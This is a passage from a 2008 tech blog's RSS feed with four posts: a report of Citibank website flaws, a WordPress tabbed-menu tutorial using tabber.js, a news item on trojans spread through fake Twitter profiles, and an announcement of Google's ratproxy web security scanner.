/> &amp;_jcontext=/US&amp;_jfp=false&amp;BVE=https://web.da-us.citibank.com&amp;BVP=/cgi-bin/citifi/scripts/<br
/> &amp;BV_UseBVCookie=yes</a></p><p><img
class="alignleft" src="http://farm4.static.flickr.com/3044/2772069837_ae27a9de45_m.jpg" alt="http://farm4.static.flickr.com/3044/2772069837_ae27a9de45_m.jpg" align="left" title="Citibank is not safe   new vulnerabilities photo" /></p><p>As discovered citibank is infected with Crimeware.For those who don&#8217;t know about crime ware-<strong> </strong></p><p><strong>Crimeware</strong> is a class of malware designed specifically to automate financial crime.It also often has the intent to export confidential or sensitive information from a network for financial exploitation.Crimeware can enable remote access into applications, allowing hackers to break into networks for malicious purposes.It can surreptitiously install keystroke loggers to collect sensitive data—login and password information for online bank accounts.</p><p>Our <a
href="http://www.xssed.com/">source</a> reveals that &#8220;Both flaws can be exploited by malicious people to conduct phishing attacks with a higher success rate and to infect Citibank&#8217;s clients with <a
href="http://en.wikipedia.org/wiki/Crimeware">crimeware</a>.&#8221;</p><p>~shout~<br
/> &#8220;Could someone inform the authority of citibank to fix this bug&#8221;</p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/cybercrime-poses-challenges-for-government-industry-says-report/" rel="bookmark" title="July 25, 2007">Cybercrime Poses Challenges for Government, Industry Says Report</a></li><li><a
href="http://www.honeytechblog.com/google-adwords-is-removing-malicious-sponsored-links/" rel="bookmark" title="April 30, 2007">Google adwords is removing malicious sponsored links</a></li><li><a
href="http://www.honeytechblog.com/how-hackers-attack-with-pdf-files/" rel="bookmark" title="January 8, 2007">How hackers attack with PDF files</a></li><li><a
href="http://www.honeytechblog.com/criminal-hackers-targeted-myspaceyoutube/" rel="bookmark" title="February 1, 2007">Criminal Hackers targeted MySpace/YouTube ?</a></li><li><a
href="http://www.honeytechblog.com/monstercom-hit-by-personal-data-attack/" rel="bookmark" title="August 22, 2007">Monster.com hit by personal data attack</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/citibank-is-not-safe-new-vulnerabilities/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>How to use multi tabbed menu in wordpress</title><link>http://www.honeytechblog.com/how-to-use-multi-tabbed-menu-in-wordpress/</link> <comments>http://www.honeytechblog.com/how-to-use-multi-tabbed-menu-in-wordpress/#comments</comments> <pubDate>Fri, 15 Aug 2008 22:43:18 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[Designs]]></category> <category><![CDATA[Full Download's]]></category> <category><![CDATA[How to]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[wordpress]]></category> <category><![CDATA[css]]></category> <category><![CDATA[html]]></category> <category><![CDATA[javascript]]></category> <category><![CDATA[menus]]></category> <category><![CDATA[style]]></category> <category><![CDATA[tabbed]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=1350</guid> <description><![CDATA[Today i implement dynamic tabbed interface for my wordpress blog and after sparing few minutes  i also fix it for some wordpress plugins like similar post and simple twitter and some others.I liked this feature and was thinking of its patch on wordpress.Multi tabbed menu often used in professional blogs and high profile blogs but [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fhow-to-use-multi-tabbed-menu-in-wordpress%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22How%20to%20use%20multi%20tabbed%20menu%20in%20wordpress%22%20%7D);"></div><p>Today i implement dynamic tabbed interface for my wordpress blog and after sparing few minutes  i also fix it for some wordpress plugins like <a
href="http://wordpress.org/extend/plugins/similar-posts/">similar post</a> and <a
href="http://wordpress.org/extend/plugins/simpletwitter/">simple twitter</a> and some others.I liked this feature and was thinking of its patch on wordpress.Multi tabbed menu often used in professional blogs and high profile blogs but their isn&#8217;t any documentation specially for wordpress.</p><p>Help: I get the tabber menu from <a
href="http://www.barelyfitz.com/projects/tabber/">barelyfitz designs</a> and i implement it as per my requirement and modifications for wordpress.</p><p><strong>Ingredients</strong></p><p>A javascript for menus named as <a
href="http://www.barelyfitz.com/projects/tabber/tabber.js">tabber.js</a></p><p>A CSS patch for the menu to display correctly <a
href="http://www.barelyfitz.com/projects/tabber/example.css">example.css</a></p><ol><li>Open the stylesheet of your current theme used in the blog (e.g style.css ) in a notepad, dreamweaver or in any text editor.</li><li>Now copy the <a
href="http://www.barelyfitz.com/projects/tabber/example.css">example.css</a> into your wordpress theme style sheet.</li><li>Now open your header.php file (header files control all the styling of the wordpress ).</li><li>Upload the javascript file <a
href="http://www.barelyfitz.com/projects/tabber/tabber.js">tabber.js</a> any where in your directory (remember the path where you upload the <a
href="http://www.barelyfitz.com/projects/tabber/tabber.js">tabber.js</a> )</li><li>Add the following code in your header,php file <strong>&lt;script type=&#8221;text/javascript&#8221; src=&#8221;path of <span
style="color: #993333;">tabber.js</span></strong><a
href="http://www.honeytechblog.com/tabber.js"><strong>&#8220;</strong></a><strong>&gt;&lt;/script&gt;</strong></li></ol><p>Now you are almost 50% done you just have to know the usage of tabbed menu.</p><p>Carefully watch the <a
href="http://www.honeytechblog.com/wp-content/uploads/2008/08/wp_menu.txt">wp_menu</a> code http://www.honeytechblog.com/wp-content/uploads/2008/08/wp_menu.txt</p><p><strong>Example of the above code will look like this</strong></p><div
class="tabber"><div
class="tabbertab"><h3>What I&#8217;m Doing</h3><p>we are learning &#8220;to use multi tabbed menu in wordpress&#8221;</p></div><div
class="tabbertab"><h3>License</h3><p>This work is licensed under a <a
rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/">Creative Commons Attribution-Non Commercial-ShareAlike 2.5 License</a></div><div
class="tabbertab"><h3>Some Interesting Posts</h3><p>Their are many just go to <a
href="www.honeytechblog.com">www.honeytechblog.com</a></p><p><strong>Another beautiful example of making tabbed menu that i have read recently and is similar to the above one is <a
title="Tabbed menu" href="http://nettuts.com/javascript-ajax/create-a-tabbed-interface-using-jquery/" target="_blank">here </a></strong></div></div><p><strong>Note:</strong> feel free to comment here if you want to know more about wordpress implementation or have any problem in fixing this menus.</p><p><strong><br
/> <a
title="Tabbed menu" href="http://nettuts.com/javascript-ajax/create-a-tabbed-interface-using-jquery/" target="_blank"></a></strong></p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/101-wordpress-tips-and-resources/" rel="bookmark" title="August 13, 2009">101 List Of Awesome Wordpress Tips and Resources</a></li><li><a
href="http://www.honeytechblog.com/how-to-optimize-website-loading-time-and-performance/" rel="bookmark" title="July 4, 2009">How to optimize website loading time and performance</a></li><li><a
href="http://www.honeytechblog.com/how-to-show-rss-feeds-in-a-wordpress-page-and-posts/" rel="bookmark" title="October 10, 2009">How to show RSS feeds in a Wordpress Page and Posts</a></li><li><a
href="http://www.honeytechblog.com/how-to-decide-the-robots-txt-for-wordpress-blogs/" rel="bookmark" title="September 14, 2009">How to decide the robots.txt for Wordpress blogs</a></li><li><a
href="http://www.honeytechblog.com/download-honeytechblog-christmas-flavored-free-wordpress-theme/" rel="bookmark" title="December 17, 2008">Download HoneytechBlog Christmas flavored wordpress theme</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/how-to-use-multi-tabbed-menu-in-wordpress/feed/</wfw:commentRss> <slash:comments>7</slash:comments> </item> <item><title>Twitter is the next targets of Trojans</title><link>http://www.honeytechblog.com/twitter-is-the-next-targets-of-trojans/</link> <comments>http://www.honeytechblog.com/twitter-is-the-next-targets-of-trojans/#comments</comments> <pubDate>Wed, 06 Aug 2008 12:24:25 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[NewsTech]]></category> <category><![CDATA[Reviews]]></category> <category><![CDATA[Social Networking]]></category> <category><![CDATA[flickr]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[twitter]]></category> <category><![CDATA[be aware]]></category> <category><![CDATA[news]]></category> <category><![CDATA[trojen]]></category> <category><![CDATA[virus]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=1303</guid> <description><![CDATA[With the increase in the social networking and popularity of twitter ,It acts as the best search engine and a source of instant answers.
For example
Once labnol blogs encounter with the wp-super cache plugin problems that through&#8217;s error message on the main url www.labnol.org. He then tweet &#8220;any one know what&#8217;s the problem&#8221;.Soon he gets lots [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Ftwitter-is-the-next-targets-of-trojans%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22Twitter%20is%20the%20next%20targets%20of%20Trojans%22%20%7D);"></div><p><img
class="alignright" src="http://farm4.static.flickr.com/3144/2737758671_c7cea202ec_m.jpg" alt="http://farm4.static.flickr.com/3144/2737758671_c7cea202ec_m.jpg" title="Twitter is the next targets of Trojans photo" />With the increase in the social networking and popularity of twitter ,It acts as the best search engine and a source of instant answers.<br
/> For example<br
/> Once labnol blogs encounter with the wp-super cache plugin problems that through&#8217;s error message on the main url <a
href="http://www.labnol.org">www.labnol.org</a>. He then tweet &#8220;any one know what&#8217;s the problem&#8221;.Soon he gets lots of reply (from me also <img
src='http://cdn.honeytechblog.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Twitter is the next targets of Trojans photo" /> ) and he manages to resolve his problem from tweeter.</p><p>Their are many example like that when people announce their new posts,updates, latest tricks and interesting url that may helps users.But point of concern is when some one makes fake profile and start circulating malicious links. What if some click on that suspicious urls? What happens to their system security?.<br
/> Actually these links are mostly from fake profile having <strong>porn</strong> ,( <strong>Brazilian</strong> language) or other stuff that attracts people to click on.On their profile their have lots of tweet updates with <strong>malicious link</strong> that may looks like mp3 but all of them are &#8220;<strong>Trojans</strong>&#8220;.These Trojan software masquerading (looks as ) as MP3 files that steals data from the machine this facts is reveals by Kaspersky&#8217;s <a
href="http://www.viruslist.com/en/weblog">Viruslist.com blog</a>.</p><p><strong>How it work?</strong><br
/> It work as if you click on the link, then their starts an automatic download ie you get a window that shows the progress of an automatic download of a so-called new version of Adobe Flash, which is supposedly required to watch the video. You end up with a file labeled Adobe Flash (it&#8217;s a fake) on your machine; a technique that is currently very popular</p><p><strong>Why this is dangerous?</strong><br
/> It is dangerous because these links can be easily circulate through multiple profiles more over google also shows twitter profiles on their search so its high probability that these links and malware circulate through google.</p><p><strong>Another major security issue in Twitter</strong><br
/> Ability of hackers and attacker to force someone to follow him automatically on twitter is still possible as disclosed by <a
href="http://www.twitpwn.com/">TwitPwn</a></p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/orkut-security-caution/" rel="bookmark" title="January 23, 2008">Orkut Security caution</a></li><li><a
href="http://www.honeytechblog.com/serious-flash-flaws/" rel="bookmark" title="April 14, 2008">Serious Flash flaws</a></li><li><a
href="http://www.honeytechblog.com/twitter-is-a-probelm/" rel="bookmark" title="March 20, 2009">Twitter is a problem ?</a></li><li><a
href="http://www.honeytechblog.com/report-twitter-adds-retweet-to-share-tweets-and-some-strange-tweets-in-your-timeline/" rel="bookmark" title="November 18, 2009">Report: Twitter adds Retweet to Share Tweets and some strange tweets in your timeline</a></li><li><a
href="http://www.honeytechblog.com/list-of-15-unfamiliar-twitter-apps-and-tools/" rel="bookmark" title="August 29, 2009">List of 15 Unfamiliar Twitter Apps and Tools</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/twitter-is-the-next-targets-of-trojans/feed/</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Google freely released its personal Web Application Security Scanner &#8211; ratproxy</title><link>http://www.honeytechblog.com/google-freely-released-its-personal-web-application-security-scanner-ratproxy/</link> <comments>http://www.honeytechblog.com/google-freely-released-its-personal-web-application-security-scanner-ratproxy/#comments</comments> <pubDate>Thu, 03 Jul 2008 18:57:29 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[Full Download's]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Tips & twiks]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[open source]]></category> <category><![CDATA[scripting]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/google-freely-released-its-personal-web-application-security-scanner-ratproxy/</guid> <description><![CDATA[Google freely released its personal tool for checking security issues of web applications as an open source tool.Ratproxy is the name of the devil that is released under an Apache 2.0 software license.Google says &#8220;Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fgoogle-freely-released-its-personal-web-application-security-scanner-ratproxy%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22Google%20freely%20released%20its%20personal%20Web%20Application%20Security%20Scanner%20-%20ratproxy%22%20%7D);"></div><p
class="Photo"><span
class="photo_container pc_m"><a
title="ratproxy" href="http://www.flickr.com/photos/honeytech/2634668566/"><img
class="pc_img alignright" style="float: right;" src="http://farm4.static.flickr.com/3085/2634668566_3379edcab1_m.jpg" alt="ratproxy" width="240" height="180" title="Google freely released its personal Web Application Security Scanner   ratproxy photo" /></a></span></p><p>Google freely released its personal tool for checking security issues of web applications as an open source tool.<strong>Ratproxy</strong> is the name of the devil that is released under an Apache 2.0 software license.Google says &#8220;<a><em>Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments</em></a>&#8221;</p><p><strong><a
href="http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz" target="_blank">Download RatProxy Now</a></strong></p><p>The ratproxy analyzes following problems</p><ul><li>Cross-site script inclusion threats</li><li>Insufficient cross-site request forgery defenses</li><li>Caching issues, cross-site scripting candidates</li><li>Unsafe cross-domain code inclusion schemes</li><li>Information leakage scenarios</li><li>C<a>ontent serving problems</a></li><li>I<a>nsufficient XSRF and XSS defenses</a></li><li><a>HTTP and META redirector&#8217;s</a></li><li><a>Suspected or confirmed XSS / data injection vectors</a></li></ul><p><strong>Supported OS</strong> : <a><em>Ratproxy</em> is currently believed to support <strong>Linux</strong>, <strong>FreeBSD</strong>, <strong>MacOS X</strong>, and <strong>Windows (Cygwin) environments</strong></a>.</p><p>Read <a
href="http://code.google.com/p/ratproxy/wiki/RatproxyDoc" target="_blank">Ratproxy Doc</a> to know how to run?, how it works? and much more</p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/release-candidate-ubuntu-904-available-for-download/" rel="bookmark" title="April 18, 2009">Release Candidate Ubuntu 9.04 Available For Download</a></li><li><a
href="http://www.honeytechblog.com/monstercom-hit-by-personal-data-attack/" rel="bookmark" title="August 22, 2007">Monster.com hit by personal data attack</a></li><li><a
href="http://www.honeytechblog.com/google-seo-tips-with-webmaster-tools/" rel="bookmark" title="January 17, 2008">Google SEO Tips With Webmaster Tools</a></li><li><a
href="http://www.honeytechblog.com/ubuntu-810-comes-with-mobility-get-free-cds-and-downloads/" rel="bookmark" title="November 2, 2008">Ubuntu 8.10 comes with Mobility &#8211; Get Free CD&#8217;s and Downloads</a></li><li><a
href="http://www.honeytechblog.com/google-talklogin-as-multiple-users/" rel="bookmark" title="December 1, 2006">Google Talk:Login as Multiple Users</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/google-freely-released-its-personal-web-application-security-scanner-ratproxy/feed/</wfw:commentRss> <slash:comments>6</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk
Page Caching using disk (user agent is rejected)
Database Caching 75/273 queries in 0.479 seconds using disk
Content Delivery Network via cdn.honeytechblog.com

Served from: www.honeytechblog.com @ 2010-03-21 07:04:35 -->